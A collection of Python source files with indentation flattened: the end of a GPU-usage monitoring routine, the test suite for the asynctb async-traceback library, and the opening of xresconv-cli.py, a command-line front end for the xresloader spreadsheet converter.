gpu_mem[i] = 0
for p in g.processes:
if p['pid'] in self._last_process_id_list:
gpu_mem[i] += p.get('gpu_memory_usage', 0)
self._last_process_pool['gpu'] = time(), gpu_mem
else:
# if we do no need to update the memory usage, run global query
# if we have no parent process (backward compatibility), return global stats
gpu_stat = self._gpustat.new_query()
gpu_mem = self._last_process_pool['gpu'][1] if self._last_process_pool.get('gpu') else None
# generate the statistics dict for actual report
stats = {}
for i, g in enumerate(gpu_stat.gpus):
# only monitor the active gpu's, if none were selected, monitor everything
if self._active_gpus and i not in self._active_gpus:
continue
stats["gpu_%d_temperature" % i] = float(g["temperature.gpu"])
stats["gpu_%d_utilization" % i] = float(g["utilization.gpu"])
stats["gpu_%d_mem_usage" % i] = 100. * float(g["memory.used"]) / float(g["memory.total"])
# already in MBs
stats["gpu_%d_mem_free_gb" % i] = float(g["memory.total"] - g["memory.used"]) / 1024
# use previously sampled process gpu memory, or global if it does not exist
stats["gpu_%d_mem_used_gb" % i] = float(gpu_mem[i] if gpu_mem else g["memory.used"]) / 1024
return stats
|
test_traceback.py
|
import contextlib
import gc
import re
import sys
import threading
import types
from contextlib import ExitStack, contextmanager
from functools import partial
from typing import List, Callable, Any, cast
import attr
import pytest
from .. import FrameInfo, Traceback, customize, register_get_target
def remove_address_details(line):
return re.sub(r"\b0x[0-9A-Fa-f]+\b", "(address)", line)
def clean_tb_line(line):
return remove_address_details(line).partition(" #")[0]
def assert_tb_matches(tb, expected, error=None):
# smoke test:
str(tb)
tb.as_stdlib_summary()
tb.as_stdlib_summary(capture_locals=True)
for frame in tb.frames:
str(frame)
try:
if error is None and tb.error is not None: # pragma: no cover
raise tb.error
assert type(tb.error) is type(error)
assert remove_address_details(str(tb.error)) == remove_address_details(
str(error)
)
assert len(tb) == len(expected)
for (
entry,
(expect_fn, expect_line, expect_ctx_name, expect_ctx_typename),
) in zip(tb, expected):
assert entry.funcname == expect_fn
assert clean_tb_line(entry.linetext) == expect_line
assert entry.context_name == expect_ctx_name
if entry.context_manager is None:
assert expect_ctx_typename is None
else:
assert type(entry.context_manager).__name__ == expect_ctx_typename
except Exception: # pragma: no cover
print_assert_matches("tb")
raise
def print_assert_matches(get_tb): # pragma: no cover
parent = sys._getframe(1)
get_tb_code = compile(get_tb, "<eval>", "eval")
tb = eval(get_tb_code, parent.f_globals, parent.f_locals)
print("---")
print(str(tb).rstrip())
print("---")
print(" assert_tb_matches(")
print(" " + get_tb + ",")
print(" [")
for entry in tb:
if entry.frame.f_code is get_tb_code:
funcname = parent.f_code.co_name
linetext = get_tb + ","
else:
funcname = entry.funcname
linetext = clean_tb_line(entry.linetext)
typename = type(entry.context_manager).__name__
if typename == "NoneType":
typename = None
record = (funcname, linetext, entry.context_name, typename)
print(" " + repr(record) + ",")
print(" ],")
if tb.error:
print(f" error={remove_address_details(repr(tb.error))},")
print(" )")
def no_abort(_): # pragma: no cover
import trio
return trio.lowlevel.Abort.FAILED
@contextmanager
def null_context():
yield
@contextmanager
def outer_context():
with inner_context() as inner: # noqa: F841
yield
def exit_cb(*exc):
pass
def other_cb(*a, **kw):
pass
@contextmanager
def inner_context():
stack = ExitStack()
with stack:
stack.enter_context(null_context())
stack.push(exit_cb)
stack.callback(other_cb, 10, "hi", answer=42)
yield
@types.coroutine
def async_yield(value):
return (yield value)
null_mgr = null_context()
with null_mgr:
if hasattr(null_mgr, "func"):
null_context_repr = "asynctb._tests.test_traceback.null_context()"
else:
null_context_repr = "null_context(...)"
del null_mgr
# There's some logic in the traceback extraction of running code that
# behaves differently when it's run in a non-main greenlet on CPython,
# because we have to stitch together the traceback portions from
# different greenlets. To exercise it, we'll run some tests in a
# non-main greenlet as well as at top level.
try:
import greenlet # type: ignore
except ImportError:
def try_in_other_greenlet_too(fn):
return fn
else:
def try_in_other_greenlet_too(fn):
def try_both():
fn()
greenlet.greenlet(fn).switch()
return try_both
def frames_from_inner_context(caller):
return [
(
caller,
"with inner_context() as inner:",
"inner",
"_GeneratorContextManager",
),
("inner_context", "with stack:", "stack", "ExitStack"),
(
"inner_context",
f"# stack.enter_context({null_context_repr})",
"stack[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# stack.push(asynctb._tests.test_traceback.exit_cb)",
"stack[1]",
None,
),
(
"inner_context",
"# stack.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"stack[2]",
None,
),
("inner_context", "yield", None, None),
]
def frames_from_outer_context(caller):
return [
(caller, "with outer_context():", None, "_GeneratorContextManager"),
*frames_from_inner_context("outer_context"),
("outer_context", "yield", None, None),
]
@try_in_other_greenlet_too
def test_running():
# These two layers of indirection are mostly to test that skip_callees
# works when using iterate_running.
@customize(skip_frame=True, skip_callees=True)
def call_call_traceback_since(root):
return call_traceback_since(root)
def call_traceback_since(root):
return Traceback.since(root)
def sync_example(root):
with outer_context():
if isinstance(root, types.FrameType):
return call_call_traceback_since(root)
else:
return Traceback.of(root)
# Currently running in this thread
assert_tb_matches(
sync_example(sys._getframe(0)),
[
("test_running", "sync_example(sys._getframe(0)),", None, None),
*frames_from_outer_context("sync_example"),
("sync_example", "return call_call_traceback_since(root)", None, None),
],
)
async def async_example():
root = await async_yield(None)
await async_yield(sync_example(root))
def generator_example():
root = yield
yield sync_example(root)
async def agen_example():
root = yield
yield sync_example(root)
for which in (async_example, generator_example, agen_example):
it = which()
if which is agen_example:
def send(val):
with pytest.raises(StopIteration) as info:
it.asend(val).send(None)
return info.value.value
else:
send = it.send
send(None)
if which is async_example:
line = "await async_yield(sync_example(root))"
else:
line = "yield sync_example(root)"
assert_tb_matches(
send(it),
[
(which.__name__, line, None, None),
*frames_from_outer_context("sync_example"),
("sync_example", "return Traceback.of(root)", None, None),
],
)
def test_suspended():
async def async_example(depth):
if depth >= 1:
return await async_example(depth - 1)
with outer_context():
return await async_yield(1)
async def agen_example(depth):
await async_example(depth)
yield # pragma: no cover
agen_makers = [agen_example]
try:
import async_generator
except ImportError:
agen_backport_example = None
else:
@async_generator.async_generator
async def agen_backport_example(depth):
await async_example(depth)
await yield_() # pragma: no cover
agen_makers.append(agen_backport_example)
# Suspended coroutine
coro = async_example(3)
assert coro.send(None) == 1
assert_tb_matches(
Traceback.of(coro),
[
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
*frames_from_outer_context("async_example"),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
assert_tb_matches(
Traceback.of(coro, with_context_info=False),
[
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
with pytest.raises(StopIteration, match="42"):
coro.send(42)
# Suspended async generator
for thing in agen_makers:
agi = thing(3)
ags = agi.asend(None)
assert ags.send(None) == 1
for view in (agi, ags):
assert_tb_matches(
Traceback.of(view, with_context_info=False),
[
(thing.__name__, "await async_example(depth)", None, None),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
# Exhausted coro/generator has no traceback
assert_tb_matches(Traceback.of(coro), [])
def test_greenlet():
greenlet = pytest.importorskip("greenlet")
tb_main = Traceback.of(greenlet.getcurrent())
assert tb_main.error is None and tb_main.frames[-1].funcname == "test_greenlet"
def outer():
with outer_context():
return inner()
def inner():
# Test getting the traceback of a greenlet from inside it
assert_tb_matches(
Traceback.of(gr),
[
*frames_from_outer_context("outer"),
("outer", "return inner()", None, None),
("inner", "Traceback.of(gr),", None, None),
],
)
return greenlet.getcurrent().parent.switch(1)
gr = greenlet.greenlet(outer)
assert_tb_matches(Traceback.of(gr), []) # not started -> empty tb
assert 1 == gr.switch()
assert_tb_matches(
Traceback.of(gr),
[
*frames_from_outer_context("outer"),
("outer", "return inner()", None, None),
("inner", "return greenlet.getcurrent().parent.switch(1)", None, None),
],
)
assert 2 == gr.switch(2)
assert_tb_matches(Traceback.of(gr), []) # dead -> empty tb
# Test tracing into the runner for a dead greenlet
def trivial_runner(gr):
assert_tb_matches(
Traceback.since(sys._getframe(0)),
[("trivial_runner", "Traceback.since(sys._getframe(0)),", None, None)],
)
@register_get_target(trivial_runner)
def get_target(frame, is_terminal):
return frame.f_locals.get("gr")
trivial_runner(gr)
def test_get_target_fails():
outer_frame = sys._getframe(0)
def inner():
return Traceback.since(outer_frame)
@customize(get_target=lambda *args: {}["wheee"])
def example():
return inner()
# Frames that produce an error get mentioned in the traceback,
# even if they'd otherwise be skipped
@customize(skip_frame=True, get_target=lambda *args: {}["wheee"])
def skippy_example():
return inner()
for fn in (example, skippy_example):
assert_tb_matches(
fn(),
[
("test_get_target_fails", "fn(),", None, None),
(fn.__name__, "return inner()", None, None),
],
error=KeyError("wheee"),
)
@pytest.mark.skipif(
sys.implementation.name == "pypy",
reason="https://foss.heptapod.net/pypy/pypy/-/blob/branch/py3.6/lib_pypy/greenlet.py#L124",
)
def test_greenlet_in_other_thread():
greenlet = pytest.importorskip("greenlet")
ready_evt = threading.Event()
done_evt = threading.Event()
gr = None
def thread_fn():
def target():
ready_evt.set()
done_evt.wait()
nonlocal gr
gr = greenlet.greenlet(target)
gr.switch()
threading.Thread(target=thread_fn).start()
ready_evt.wait()
assert_tb_matches(
Traceback.of(gr),
[],
error=RuntimeError(
"Traceback.of(greenlet) can't handle a greenlet running in another thread"
),
)
done_evt.set()
def test_exiting():
# Test traceback when a synchronous context manager is currently exiting.
result: Traceback
@contextmanager
def capture_tb_on_exit(coro):
with inner_context() as inner: # noqa: F841
try:
yield
finally:
nonlocal result
result = Traceback.of(coro)
async def async_capture_tb():
coro = await async_yield(None)
with capture_tb_on_exit(coro):
pass
await async_yield(result)
coro = async_capture_tb()
coro.send(None)
assert_tb_matches(
coro.send(coro),
[
(
"async_capture_tb",
"with capture_tb_on_exit(coro):",
None,
"_GeneratorContextManager",
),
("async_capture_tb", "pass", None, None),
("__exit__", "next(self.gen)", None, None),
*frames_from_inner_context("capture_tb_on_exit"),
("capture_tb_on_exit", "result = Traceback.of(coro)", None, None),
],
)
# Test traceback when an async CM is suspended in __aexit__. The
# definition of __aexit__ as a staticmethod is to foil the logic
# for figuring out which context manager is exiting.
class SillyAsyncCM:
async def __aenter__(self):
pass
@staticmethod
async def __aexit__(*stuff):
await async_yield(None)
async def yield_when_async_cm_exiting():
async with SillyAsyncCM():
pass
coro = yield_when_async_cm_exiting()
coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("yield_when_async_cm_exiting", "async with SillyAsyncCM():", None, None),
("yield_when_async_cm_exiting", "pass", None, None),
("__aexit__", "await async_yield(None)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_errors():
with pytest.raises(TypeError, match="must be a frame"):
Traceback.since(42)
with pytest.raises(TypeError, match="must be a frame or integer"):
Traceback.until(sys._getframe(0), limit=2.4)
with pytest.raises(RuntimeError, match="is not an indirect caller of"):
Traceback.until(sys._getframe(1), limit=sys._getframe(0))
@try_in_other_greenlet_too
def test_traceback_until():
outer = sys._getframe(0)
def example():
inner = sys._getframe(0)
def get_tb(limit):
return Traceback.until(inner, limit=limit)
tb1, tb2, tb3 = [get_tb(lim) for lim in (1, outer, None)]
assert tb1 == tb2
assert tb3.frames[-len(tb1) :] == tb1.frames
assert_tb_matches(
tb1,
[
("test_traceback_until", "example()", None, None),
(
"example",
"tb1, tb2, tb3 = [get_tb(lim) for lim in (1, outer, None)]",
None,
None,
),
],
)
example()
@try_in_other_greenlet_too
def test_running_in_thread():
def thread_example(arrived_evt, depart_evt):
with outer_context():
arrived_evt.set()
depart_evt.wait()
def thread_caller(*args):
thread_example(*args)
# Currently running in other thread
for cooked in (False, True):
arrived_evt = threading.Event()
depart_evt = threading.Event()
thread = threading.Thread(target=thread_caller, args=(arrived_evt, depart_evt))
thread.start()
try:
arrived_evt.wait()
if cooked:
tb = Traceback.of(thread)
else:
top_frame = sys._current_frames()[thread.ident]
while (
top_frame.f_back is not None
and top_frame.f_code.co_name != "thread_caller"
):
top_frame = top_frame.f_back
tb = Traceback.since(top_frame)
# Exactly where we are inside Event.wait() is indeterminate, so
# strip frames until we find Event.wait() and then remove it
while (
not tb.frames[-1].filename.endswith("threading.py")
or tb.frames[-1].funcname != "wait"
): # pragma: no cover
tb = attr.evolve(tb, frames=tb.frames[:-1])
while tb.frames[-1].filename.endswith("threading.py"): # pragma: no cover
tb = attr.evolve(tb, frames=tb.frames[:-1])
assert_tb_matches(
tb,
[
("thread_caller", "thread_example(*args)", None, None),
*frames_from_outer_context("thread_example"),
("thread_example", "depart_evt.wait()", None, None),
],
)
finally:
depart_evt.set()
def test_traceback_of_not_alive_thread(isolated_registry):
thread = threading.Thread(target=lambda: None)
assert_tb_matches(Traceback.of(thread), [])
thread.start()
thread.join()
assert_tb_matches(Traceback.of(thread), [])
@customize(get_target=lambda *_: thread)
async def example():
await async_yield(42)
coro = example()
coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("example", "await async_yield(42)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_trace_into_thread(local_registry):
trio = pytest.importorskip("trio")
import outcome
# Extremely simplified version of trio.to_thread.run_sync
async def run_sync_in_thread(sync_fn):
task = trio.lowlevel.current_task()
trio_token = trio.lowlevel.current_trio_token()
def run_it():
result = outcome.capture(sync_fn)
trio_token.run_sync_soon(trio.lowlevel.reschedule, task, result)
thread = threading.Thread(target=run_it)
thread.start()
return await trio.lowlevel.wait_task_rescheduled(no_abort)
@register_get_target(run_sync_in_thread)
def get_target(this_frame, next_frame):
return this_frame.f_locals["thread"]
customize(run_sync_in_thread, "run_it", skip_frame=True)
tb = None
async def main():
arrived_evt = trio.Event()
depart_evt = threading.Event()
trio_token = trio.lowlevel.current_trio_token()
task = trio.lowlevel.current_task()
def sync_fn():
with inner_context() as inner: # noqa: F841
trio_token.run_sync_soon(arrived_evt.set)
depart_evt.wait()
def sync_wrapper():
sync_fn()
async def capture_tb():
nonlocal tb
try:
await arrived_evt.wait()
tb = Traceback.of(task.coro)
finally:
depart_evt.set()
async with trio.open_nursery() as nursery:
nursery.start_soon(capture_tb)
await run_sync_in_thread(sync_wrapper)
trio.run(main)
# It's indeterminate where in sync_fn() the traceback was taken -- it could
# be inside run_sync_soon() or inside threading.Event.wait() -- so trim
# traceback frames until we get something reliable.
while tb.frames[-1].filename != __file__:
tb = attr.evolve(tb, frames=tb.frames[:-1])
tb = attr.evolve(
tb,
frames=tb.frames[:-1]
+ (attr.evolve(tb.frames[-1], override_line="<indeterminate>"),),
)
assert_tb_matches(
tb,
[
(
"main",
"async with trio.open_nursery() as nursery:",
"nursery",
"Nursery",
),
("main", "await run_sync_in_thread(sync_wrapper)", None, None),
(
"run_sync_in_thread",
"return await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
("sync_wrapper", "sync_fn()", None, None),
*frames_from_inner_context("sync_fn"),
("sync_fn", "<indeterminate>", None, None),
],
)
@pytest.mark.skipif(
sys.implementation.name == "pypy",
reason="profile function doesn't get called on Travis",
)
def test_threaded_race():
# This tests the case where we're getting the traceback of a coroutine
# running in a foreign thread, but it becomes suspended before we can
# extract the foreign thread's stack.
afn_running = threading.Event()
suspend_afn = threading.Event()
afn_suspended = threading.Event()
resume_afn = threading.Event()
async def async_fn():
with outer_context():
afn_running.set()
suspend_afn.wait()
await async_yield(1)
coro = async_fn()
def runner():
coro.send(None)
afn_suspended.set()
resume_afn.wait()
with pytest.raises(StopIteration):
coro.send(None)
def suspend_at_proper_place(frame, event, arg): # pragma: no cover
# (profile functions don't get traced)
if (
event == "call"
and frame.f_globals is Traceback.of.__func__.__globals__
and frame.f_code.co_name == "try_from"
):
suspend_afn.set()
afn_suspended.wait()
old_profile = sys.getprofile()
sys.setprofile(suspend_at_proper_place)
try:
thread = threading.Thread(target=runner)
thread.start()
assert_tb_matches(
Traceback.of(coro),
[
*frames_from_outer_context("async_fn"),
("async_fn", "await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
finally:
sys.setprofile(old_profile)
resume_afn.set()
def test_unknown_awaitable():
class WeirdObject:
def __await__(self):
return iter([42])
async def example():
await WeirdObject()
coro = example()
assert 42 == coro.send(None)
name = "sequence" if sys.implementation.name == "pypy" else "list_"
assert_tb_matches(
Traceback.of(coro),
[("example", "await WeirdObject()", None, None)],
error=RuntimeError(
f"Couldn't determine the frame associated with builtins.{name}iterator "
f"<{name}iterator object at (address)>",
),
)
assert_tb_matches(
Traceback.of(42),
[],
error=RuntimeError(
"Couldn't determine the frame associated with builtins.int 42"
),
)
def test_cant_get_referents(monkeypatch):
async def agen():
await async_yield(1)
yield
async def afn():
await async_yield(1)
class SomeAwaitable:
def __await__(self):
return wrapper
ags = agen().asend(None)
wrapper = afn().__await__()
real_get_referents = gc.get_referents
def patched_get_referents(obj):
if obj is ags or obj is wrapper:
return []
return real_get_referents(obj)
monkeypatch.setattr(gc, "get_referents", patched_get_referents)
async def await_it(thing):
await thing
for thing, problem, attrib in (
(ags, ags, "an ag_frame"),
(SomeAwaitable(), wrapper, "a cr_frame"),
):
coro = await_it(thing)
assert 1 == coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[("await_it", "await thing", None, None)],
error=RuntimeError(
f"{problem!r} doesn't refer to anything with {attrib} attribute"
),
)
with pytest.raises(StopIteration):
coro.send(None)
def test_cant_find_running_frame():
greenlet = pytest.importorskip("greenlet")
async def caller():
await example()
async def example():
with outer_context():
greenlet.getcurrent().parent.switch(42)
coro = caller()
gr = greenlet.greenlet(coro.send)
assert gr.switch(None) == 42
assert_tb_matches(
Traceback.of(coro),
[("caller", "await example()", None, None)],
error=RuntimeError(
"Couldn't find where the above frame is running, so can't continue "
"traceback"
),
)
with pytest.raises(StopIteration):
gr.switch(None)
def test_with_trickery_disabled(monkeypatch):
import asynctb
monkeypatch.setattr(asynctb._frames, "_can_use_trickery", False)
def sync_example(root):
with outer_context():
return Traceback.since(root)
# CPython GC doesn't crawl currently executing frames, so we get more
# data without trickery on PyPy than on CPython
only_on_pypy = [
("sync_example", "", None, "_GeneratorContextManager"),
("outer_context", "", None, "_GeneratorContextManager"),
("inner_context", "", None, "ExitStack"),
(
"inner_context",
"# _.enter_context(asynctb._tests.test_traceback.null_context())",
"_[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# _.push(asynctb._tests.test_traceback.exit_cb)",
"_[1]",
None,
),
(
"inner_context",
"# _.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"_[2]",
None,
),
("inner_context", "yield", None, None),
("outer_context", "yield", None, None),
]
assert_tb_matches(
sync_example(sys._getframe(0)),
[
(
"test_with_trickery_disabled",
"sync_example(sys._getframe(0)),",
None,
None,
),
*(only_on_pypy if sys.implementation.name == "pypy" else []),
("sync_example", "return Traceback.since(root)", None, None),
],
)
async def async_example():
with outer_context():
return await async_yield(42)
coro = async_example()
assert 42 == coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("async_example", "", None, "_GeneratorContextManager"),
("outer_context", "", None, "_GeneratorContextManager"),
("inner_context", "", None, "ExitStack"),
(
"inner_context",
f"# _.enter_context({null_context_repr})",
"_[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# _.push(asynctb._tests.test_traceback.exit_cb)",
"_[1]",
None,
),
(
"inner_context",
"# _.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"_[2]",
None,
),
("inner_context", "yield", None, None),
("outer_context", "yield", None, None),
("async_example", "return await async_yield(42)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_trio_nursery():
trio = pytest.importorskip("trio")
async_generator = pytest.importorskip("async_generator")
@async_generator.asynccontextmanager
@async_generator.async_generator
async def uses_nursery():
async with trio.open_nursery() as inner: # noqa: F841
await async_generator.yield_()
async def main():
result: Traceback
task = trio.lowlevel.current_task()
def report_back():
nonlocal result
result = Traceback.of(task.coro)
trio.lowlevel.reschedule(task)
async with trio.open_nursery() as outer, uses_nursery(): # noqa: F841
trio.lowlevel.current_trio_token().run_sync_soon(report_back)
await trio.lowlevel.wait_task_rescheduled(no_abort)
return result
assert_tb_matches(
trio.run(main),
[
(
"main",
"async with trio.open_nursery() as outer, uses_nursery():",
"outer",
"Nursery",
),
(
"main",
"async with trio.open_nursery() as outer, uses_nursery():",
None,
"_AsyncGeneratorContextManager",
),
(
"uses_nursery",
"async with trio.open_nursery() as inner:",
"inner",
"Nursery",
),
("uses_nursery", "await async_generator.yield_()", None, None),
("main", "await trio.lowlevel.wait_task_rescheduled(no_abort)", None, None),
],
)
def test_greenback():
trio = pytest.importorskip("trio")
greenback = pytest.importorskip("greenback")
results: List[Traceback] = []
async def outer():
async with trio.open_nursery() as outer_nursery: # noqa: F841
middle()
await inner()
def middle():
nursery_mgr = trio.open_nursery()
with greenback.async_context(nursery_mgr) as middle_nursery: # noqa: F841
greenback.await_(inner())
# This winds up traversing an await_ before it has a coroutine to use.
class ExtractWhenAwaited:
def __await__(self):
task = trio.lowlevel.current_task()
assert_tb_matches(
Traceback.of(task.coro),
[
(
"greenback_shim",
"return await _greenback_shim(orig_coro)",
None,
None,
),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "middle()", None, None),
(
"middle",
"with greenback.async_context(nursery_mgr) as middle_nursery:",
"middle_nursery",
"Nursery",
),
(
"middle",
"greenback.await_(ExtractWhenAwaited())",
None,
None,
),
("adapt_awaitable", "return await aw", None, None),
("__await__", "Traceback.of(task.coro),", None, None),
],
)
yield from ()
greenback.await_(ExtractWhenAwaited()) # pragma: no cover
async def inner():
with null_context():
task = trio.lowlevel.current_task()
def report_back():
results.append(Traceback.of(task.coro))
trio.lowlevel.reschedule(task)
trio.lowlevel.current_trio_token().run_sync_soon(report_back)
await trio.lowlevel.wait_task_rescheduled(no_abort)
async def main():
await greenback.ensure_portal()
return await outer()
trio.run(main)
assert len(results) == 2
assert_tb_matches(
results[0],
[
("greenback_shim", "return await _greenback_shim(orig_coro)", None, None,),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "middle()", None, None),
(
"middle",
"with greenback.async_context(nursery_mgr) as middle_nursery:",
"middle_nursery",
"Nursery",
),
("middle", "greenback.await_(inner())", None, None),
("inner", "with null_context():", None, "_GeneratorContextManager"),
("null_context", "yield", None, None),
(
"inner",
"await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
],
)
assert_tb_matches(
results[1],
[
("greenback_shim", "return await _greenback_shim(orig_coro)", None, None,),
("main", "return await outer()", None, None),
(
"outer",
"async with trio.open_nursery() as outer_nursery:",
"outer_nursery",
"Nursery",
),
("outer", "await inner()", None, None),
("inner", "with null_context():", None, "_GeneratorContextManager"),
("null_context", "yield", None, None),
(
"inner",
"await trio.lowlevel.wait_task_rescheduled(no_abort)",
None,
None,
),
],
)
def test_exitstack_formatting():
class A:
def __repr__(self):
return "A()"
def method(self, *args):
pass
with ExitStack() as stack:
stack.callback(A().method)
stack.push(A().method)
stack.callback(partial(lambda x: None, 42))
tb = Traceback.since(sys._getframe(0))
assert_tb_matches(
tb,
[
(
"test_exitstack_formatting",
"with ExitStack() as stack:",
"stack",
"ExitStack",
),
(
"test_exitstack_formatting",
"# stack.callback(A().method)",
"stack[0]",
None,
),
(
"test_exitstack_formatting",
"# stack.push(A().method)",
"stack[1]",
"A",
),
(
"test_exitstack_formatting",
"# stack.callback(functools.partial(<function test_exitstack_formatting.<locals>.<lambda> at (address)>, 42))",
"stack[2]",
None,
),
(
"test_exitstack_formatting",
"tb = Traceback.since(sys._getframe(0))",
None,
None,
),
],
)
ACM_IMPLS: List[Callable[..., Any]] = []
try:
ACM_IMPLS.append(cast(Any, contextlib).asynccontextmanager)
except AttributeError:
pass
try:
import async_generator
except ImportError:
pass
else:
ACM_IMPLS.append(async_generator.asynccontextmanager)
@pytest.mark.parametrize("asynccontextmanager", ACM_IMPLS)
def test_asyncexitstack_formatting(asynccontextmanager):
try:
from contextlib import AsyncExitStack
except ImportError:
try:
from async_exit_stack import AsyncExitStack # type: ignore
except ImportError: # pragma: no cover
pytest.skip("no AsyncExitStack")
class A:
def __repr__(self):
return "<A>"
async def __aenter__(self):
pass
async def __aexit__(self, *exc):
pass
async def aexit(self, *exc):
pass
async def aexit2(*exc):
pass
async def acallback(*args):
pass
@asynccontextmanager
async def amgr():
yield
async def async_fn():
async with AsyncExitStack() as stack:
await stack.enter_async_context(A())
await stack.enter_async_context(amgr())
stack.push_async_exit(A().aexit)
stack.push_async_exit(aexit2)
stack.push_async_callback(acallback, "hi")
await async_yield(None)
if asynccontextmanager.__module__.startswith("async_generator"):
expect_name = "amgr(...)"
else:
expect_name = (
"asynctb._tests.test_traceback.test_asyncexitstack_formatting."
"<locals>.amgr()"
)
coro = async_fn()
assert coro.send(None) is None
assert_tb_matches(
Traceback.of(coro),
[
(
"async_fn",
"async with AsyncExitStack() as stack:",
"stack",
"AsyncExitStack",
),
("async_fn", "# await stack.enter_async_context(<A>)", "stack[0]", "A"),
(
"async_fn",
f"# await stack.enter_async_context({expect_name})",
"stack[1]",
"_AsyncGeneratorContextManager",
),
("amgr", "yield", None, None),
("async_fn", "# stack.push_async_exit(<A>.aexit)", "stack[2]", "A"),
(
"async_fn",
"# stack.push_async_exit(asynctb._tests.test_traceback.test_asyncexitstack_formatting.<locals>.aexit2)",
"stack[3]",
None,
),
(
"async_fn",
"# stack.push_async_callback(asynctb._tests.test_traceback.test_asyncexitstack_formatting.<locals>.acallback, 'hi')",
"stack[4]",
None,
),
("async_fn", "await async_yield(None)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
|
xresconv-cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import glob
import io
import locale
import os
import platform
import re
import shutil
import string
import sys
import tempfile
# ==================================================================================
import threading
import xml.etree.ElementTree as ET
from multiprocessing import cpu_count
from optparse import OptionParser
from subprocess import PIPE, STDOUT, Popen
from print_color import cprintf_stderr, cprintf_stdout, print_style
console_encoding = sys.getfilesystemencoding()
if 'utf-8' != sys.getdefaultencoding().lower():
try:
sys.setdefaultencoding('utf-8')
except Exception:
reload(sys)
sys.setdefaultencoding('utf-8')
xconv_options = {
'version': '1.1.0.1',
'conv_list': None,
'real_run': True,
'args': {},
'ext_args_l1': [],
'ext_args_l2': [],
'work_dir': '.',
'xresloader_path': 'xresloader.jar',
'item': [],
'parallelism': int((cpu_count() - 1) / 2) + 1,
'java_options': [],
'default_scheme': {}
}
# 默认双线程,实际测试过程中java的运行优化反而比多线程更能提升效率
if xconv_options['parallelism'] > 2:
xconv_options['parallelism'] = 2
xconv_xml_global_nodes = []
xconv_xml_list_item_nodes = []
usage = "usage: %prog [options...] <convert list file> [xresloader options...]"
parser = OptionParser(usage)
parser.disable_interspersed_args()
parser.add_option(
"-v",
"--version",
action="store_true",
help="show version and exit",
dest="version",
default=False)
parser.add_option(
"-s",
"--scheme-name",
action="append",
help="only convert schemes with name <scheme name>",
metavar="<scheme>",
dest="rule_schemes",
default=[])
parser.add_option(
"-t",
"--test",
action="store_true",
help="test run and show cmds",
dest="test",
default=False)
parser.add_option(
"-p",
"--parallelism",
action="store",
help="set parallelism task number(default:" +
str(xconv_options['parallelism']) + ')',
metavar="<number>",
dest="parallelism",
type="int",
default=xconv_options['parallelism'])
parser.add_option(
"-j",
"--java-option",
action="append",
help="add java options to command(example: Xmx=2048m)",
metavar="<java option>",
dest="java_options",
default=[])
(options, left_args) = parser.parse_args()
if options.version:
print(xconv_options['version'])
exit(0)
def print_help_msg(err_code):
parser.print_help()
exit(err_code)
if 0 == len(left_args):
print_help_msg(-1)
xconv_options['conv_list'] = left_args.pop(0)
xconv_options['ext_args_l2'] = left_args
# ========================================= 全局配置解析 =========================================
''' 读取xml文件 '''
def load_xml_file(file_path):
try:
xml_doc = ET.parse(file_path)
except Exception as e:
print(e)
exit(-2)
root_node = xml_doc.getroot()
if root_node == None:
print('[ERROR] root node not found in xml')
print_help_msg(-3)
# 枚举include文件
include_nodes = root_node.findall("./include")
if include_nodes and len(include_nodes) > 0:
dir_prefix = os.path.dirname(file_path)
for include_node in include_nodes:
include_file_path = include_node.text
if include_file_path and len(include_file_path) > 1:
if include_file_path[0] != '/' and include_file_path[1] != ':':
include_file_path = os.path.join(dir_prefix,
include_file_path)
load_xml_file(include_file_path)
global_nodes = root_node.findall("./global")
if global_nodes and len(global_nodes) > 0:
xconv_xml_global_nodes.extend(global_nodes)
list_item_nodes = root_node.findall("./list/item")
if list_item_nodes and len(list_item_nodes) > 0:
xconv_xml_list_item_nodes.extend(list_item_nodes)
load_xml_file(xconv_options['conv_list'])
# global配置解析/合并
def load_global_options(gns):
for global_node in gns:
for global_option in global_node:
tag_name = global_option.tag.lower()
text_value = global_option.text
if text_value:
trip_value = text_value.strip()
else:
trip_value = None
if not trip_value:
continue
if tag_name == 'work_dir':
xconv_options['work_dir'] = text_value
elif tag_name == 'xresloader_path':
xconv_options['xresloader_path'] = text_value
elif tag_name == 'proto':
xconv_options['args']['-p'] = trip_value
elif tag_name == 'output_type':
xconv_options['args']['-t'] = trip_value
elif tag_name == 'proto_file':
xconv_options['args']['-f'] = '"' + text_value + '"'
elif tag_name == 'output_dir':
